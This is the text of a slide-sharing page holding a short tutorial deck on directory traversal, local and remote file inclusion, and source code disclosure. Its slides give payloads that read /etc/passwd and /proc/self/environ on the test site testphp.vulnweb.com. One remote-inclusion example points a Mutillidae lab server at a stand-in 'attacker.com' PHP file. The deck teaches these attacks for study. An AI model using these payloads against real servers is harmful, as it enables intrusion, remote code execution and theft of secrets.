Downloaded 33 times
Uploaded byRaghav Bisht
Directory Traversal & File Inclusion Attacks
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
More Related Content
Similar to Directory Traversal & File Inclusion Attacks
![Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]](https://cdn.slidesharecdn.com/ss_thumbnails/remotefileinclusion-localfileinclusionattackanddefensetechniques-191123200430-thumbnail.jpg?width=640&height=640&fit=bounds)
Directory Traversal & File Inclusion Attacks
- 2. What is DirectoryTraversal ? Directory traversal or Path Traversal is an HTTP attack which allows attackers to access restricted directories and execute commands outside of the web server's root directory. A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, such that characters representing "traverse to parent directory" are passed through to the file APIs Also known as File Path Traversal Attack or Dot Dot Slash Attack (../../ or ....)
- 3. Type of DirectoryTraversal Attacks File Inclusion Local File Inclusion Remote File Inclusion Server Side - Script Source Code Disclosure
- 4. What is LocalFile Inclusion ? Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application in including files on the web server by exploiting functionality that dynamically includes local files or scripts. The consequence of a successful LFI attack includes Directory Traversal and Information Disclosure as well as Remote Code Execution. Payloads : ../etc/passwd ../proc/self/environ http://testphp.vulnweb.com/showimage.php?file=../../etc/passwd
- 5. Use Burp suiteto view following link : http://testphp.vulnweb.com/showimage.php?file=../../etc/passwd Local File Inclusion
- 7. What is RemoteFile Inclusion Remote File inclusion (RFI) refers to an inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts. The consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution.
- 8. Use Mutillidae fordemonstration : Eg. http://192.168.137.39/mutillidae/index.php?page=document- viewer.php&PathToDocument=http://attacker.com/malicious_file.php Remote File Inclusion
- 10. What is Scriptsource code disclosure ? Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. In this type of attack, attacker take advantage of file path traversal vulnerability to read server side source code of an application.
- 11. Use Burp suiteto view following link : http://testphp.vulnweb.com/showimage.php?file=database_connect.php Server-Side Script Source code disclosure